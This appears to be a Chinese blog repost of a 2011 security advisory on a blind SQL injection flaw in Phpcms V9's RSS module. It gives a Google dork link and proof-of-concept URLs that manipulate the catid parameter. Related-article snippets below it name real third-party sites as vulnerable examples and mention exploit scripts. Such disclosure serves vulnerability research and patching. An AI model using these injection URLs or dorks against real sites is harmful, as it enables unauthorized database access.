Phpcms V9 网站管理系统 SQL 盲注入漏洞

最新推荐文章于 2021-05-13 19:32:06 发布
最新推荐文章于 2021-05-13 19:32:06 发布
阅读量1.5k 收藏
点赞数
分类专栏: ccbz^漏洞整理 文章标签: sql google mysql table 2010

=================================================================
Phpcms V9 BLind SQL Injection Vulnerability
非常简单的英文,连我这英语不及格的都看得懂…… 囧~ 就不翻译了……
=================================================================
Phpcms V9 网站管理系统 SQL 盲注入漏洞

        Software: Phpcms V9
        Vendor: www.Phpcms.cn
        Vuln Type: BLind SQL Injection
        Download link: http://www.Phpcms.cn/2010/1229/326.html
        Author: eidelweiss
        contact: eidelweiss[at]windowslive[dot]com
        Home: www.eidelweiss.info
        Phpcms V9 网站管理系统 SQL 盲注入漏洞

        Google Dork:
            http://www.exploit-db.com/ghdb/3676/    //check here ^_^
        Phpcms V9 网站管理系统 SQL 盲注入漏洞

        References:
            http://eidelweiss-advisories.blogspot.com/2011/01/Phpcms-v9-blind-sql-injection.html
        Phpcms V9 网站管理系统 SQL 盲注入漏洞

        =================================================================
            exploit & p0c
        Phpcms V9 网站管理系统 SQL 盲注入漏洞

        [!] index.php?m=content&c=rss&catid=[valid catid]
        Phpcms V9 网站管理系统 SQL 盲注入漏洞

            Example p0c
        Phpcms V9 网站管理系统 SQL 盲注入漏洞

        [!] http://host/index.php?m=content&c=rss&catid=10  <= True
        [!] http://host/index.php?m=content&c=rss&catid=-10 <= False
        [+] http://host/index.php?m=content&c=rss&catid=5   <= show MySQL Error (table)
        Phpcms V9 网站管理系统 SQL 盲注入漏洞

        =================================================================
        Phpcms V9 网站管理系统 SQL 盲注入漏洞

=================================================================
Nothing Impossible In This World Even Nobody`s Perfect
=================================================================
Phpcms V9 网站管理系统 SQL 盲注入漏洞

    Phpcms V9 网站管理系统 SQL 盲注入漏洞,Phpcms V9 BLind SQL Injection Vulnerability,Phpcms V9 网站内容管理系统SQL注入,Phpcms V9 网站管理系统SQL盲注。

hkccbz
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
phpcmsV9sql注射漏洞及修复
weixin_34248118的博客
07-10 290
phpcmsV9sql注射漏洞及修复2014-05-24 0个评论 收藏我要投稿 别人说最危险的地方最安全,我说最安全的地方最危险。。。相信你们也没有想到这个最常见,常常会在各种教程出现的地方会存在SQL注射。。。需 GPC OFF首先,我们看登陆的地方。。最常见了吧。。。 http://127.0.0.1/index.php?m=member&c=in...
phpcmsV9.6.0sql漏洞分析
shelter1234567的博客
09-11 1414
本次分析phpcmsV9.6.0 的sql漏洞,过程很曲折,就像cc链一样,要一步一步找到利用的链。纯手动分析没有软件调试,中间找类啊,方法啊 ,都是按照代码流程写的流程分析的,对自己也是一个挑战吧!
PHPCMS V9爆出多个SQL漏洞
weixin_30653023的博客
09-13 245
phpcms 使用sys_auth函数加解密cookie信息,系统中多个文件直接从cookie中获取变量进程序流程。 由于sys_auth函数在设计和使用过程中存在缺陷,导致注册用户可以伪造cookie数据,触发SQL等多个二次攻击。 看sys_auth函数代码 //libs/functions/global.func.php function sys_auth($txt, $opera...
php v9 sql,PHPCMS v9 SQL
weixin_29920697的博客
03-17 416
2013 年 2 月 4 日 by lanu文章题目:[漏洞分析]PHPCMS v9 SQL作 者:L.N. && n3w1yb1r7h时 间:2013-02-03声 明:此漏洞非本人首发,在此只作代码分析。漏洞分析:漏洞文件:/phpcms/modules/member/index.php[php]public functi...
php v9 sql,phpcmsv9最新高危sqlexp
weixin_35545345的博客
03-17 233
获取当前数据库http://192.168.1.139:8080/phpcms/index.php?m=member&c=index&a=loginpost:forward=http%253A%252F%252F192.168.1.139%253A8080%252Fphpcms%252Findex.php%253Fm%253Dmember&username=phpcms&a...
PHPCMS2008广告模板SQL漏洞修复
10-21
PHPCMS2008是一款流行的开源内容管理系统,然而,如标题所示,它存在一个广告模板SQL漏洞,这个问题在2008年的版本中尤为突出。SQL是一种常见的网络安全威胁,允许攻击者通过操纵输数据来执行恶意SQL命令...
PHPCMS V9专题模块注漏洞的分析与修复方法
09-29
本文来分析一下PHPCMS V9专题模块注漏洞
phpcms网站管理系统 v2.2
最新发布
04-11
phpcms网站管理系统 v2.2详解》 phpcms,作为一款基于PHP语言开发的开源内容管理系统,一直以来都备受开发者和网站管理员的青睐。本文将深解析phpcms v2.2版本,探讨其核心功能、架构设计以及在企业网站管理中...
安装PHPCMS网站内容管理系统教程
09-29
关键字描述:管理系统 教程 内容 网站 安装 目录 文件 使用 软件 phpcms(一)安装前的准备 Phpcms 具备跨平台特性,可以运行于 Linux/FreeBSD/Unix 及微软 Windows 2000/2003 等各种操作系统环境下。我们已在软件中...
PHPCMS V9 BLind SQL Injection Vulnerability
weixin_34037977的博客
04-10 77
见:http://seclists.org/bugtraq/2011/Jan/139 例如北大的一个网站: http://www.cala.pku.edu.cn/index.php?m=content&c=rss&catid=5&siteid=1 又如: http://www.kuqiwan.com/index.php?m=content&c=rss&a...
PHPCMS网站系统源码官方版 v9.3.4
04-02
PHPCMS V9采用PHP5+MYSQL做为技术基础进行开发。PHPCMS V9采用OOP(面向对象)方式进行基础运行框架搭建。模块化开发方式做为功能开发形式。框架易于功能扩展,代码维护,优秀的二次开发能力,可满足所有网站的应用需求。PHPCMS V9在保留2008版的特点的同时,对新版本作出重大的创新,为此我们做出了巨大的努力,希望能为更多的站长提供优质的建站系统! PHPCMS V9目前已提供文章、图片、下载等内容模型,在此基础上可非常方便的扩展出信息、房产、交友、点评等功能。已有的模块有:会员、在线充值、全站搜索、评论、专题、新闻心情、短消息、投票、友情链接、公告、附件管理、数据源模块、广告、采集、表单向导、手机门户等模块。 版本V9.3.4 功能变更及bug修正说明: 1. 修复漏洞:支付模块过滤不严格导致SQL 2. 修正后台登陆过期时间问题 3. 修复遍历上级目录漏洞 4. 防止注漏洞。 5. 修复:后台管理员密码泄露后,可能存在的SQL 6. phpsso后台弱密码,可能导致用户资料被删除 7. 修复plugin 在 register_global=ON 时,存在包含任意文件的漏洞 8. 修复漏洞:cookie被二次利用,导致SQL 9. 修复:获取cookie和读取cookie不严格,导致数据库SQL 10. 增强后台权限验证 11. 优化验证码功能 12. 优化:防止注册机重复利用验证码注册 13. 优化附件安全 升级方法: 一、后台自动升级 进管理后台--扩展--在线升级 直接升级即可! 二、下载升级包按顺序手工升级
php cms 代码注,PHPCMS全版本通杀SQL漏洞
weixin_42458282的博客
04-14 914
漏洞分析首先看下面的代码/phpcms/modules/member/content.php 202行 edit函数[php]public function edit() {$_username = $this->memberinfo['username'];if(isset($_POST['dosubmit'])) {$catid = $_POST['info']['catid'] = i...
phpcms v9.6.0 sql & 文件上传
weixin_45605352的博客
05-13 692
phpcms v9.6.0 sql漏洞 漏洞分析详解:http://blog.nsfocus.net/phpcms-v9-6-content-module-sql-injection-vulnerability-analysis/ 这里直接利用exp,python脚本来复现漏洞:https://www.cnblogs.com/Spec/p/10844822.html,需要在文件中更改url和语句来使用 暴出库名和表明(由于长度限制而显示不全): phpcms v9.6.0文件上传漏洞 漏洞原理分析详
利用phpcms后台漏洞渗透某网站
chengman3837的博客
04-24 3631
本文来源于i春秋学院,未经允许严禁转载 phpcms v9版本最近爆了好几个漏洞,网上公开了不少信息,但没有真正实战过,就不能掌握其利用方法,本次是在偶然的机会下,发现一个网站推荐楼凤信息,通过分析,其采用了phpcms系统,经过测试成功获取webshell。 1.1扫描及分析端口信...
phpcms mysql 扩展_让PHPCMS V9 支持Composer第三方扩展类库
weixin_39986178的博客
01-28 630
前言什么是Composer为了避免一些不必要的麻烦,唠叨几句composer,其实我自己也迷糊ing,这方面知识面向百度!Composer 是 PHP5.3以上 的一个依赖管理工具。它允许你声明项目所依赖的代码库,它会在你的项目中为你安装他们。Composer 不是一个包管理器。是的,它涉及 “packages” 和 “libraries”,但它在每个项目的基础上进行管理,在你项目的某个目录中(例...
phpcms V9 BLind SQL Injection Vulnerability
Yatere的天平秤
04-25 1045
<br />=================================================================<br />    phpcms V9 BLind SQL Injection Vulnerability<br />=================================================================<br /><br />Software:   phpcms V9<br />Vendor:     www.
PHPCMS V9企业级内容管理系统详解与功能概览
PHPCMS V9是一款由上海盛大网络发展有限公司开发的企业级内容管理系统,它基于PHP和AJAX技术,专注于简化网站内容的创建、维护、发布和管理。本产品白皮书作为用户指南,旨在帮助新老用户更好地理解和掌握这款系统的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值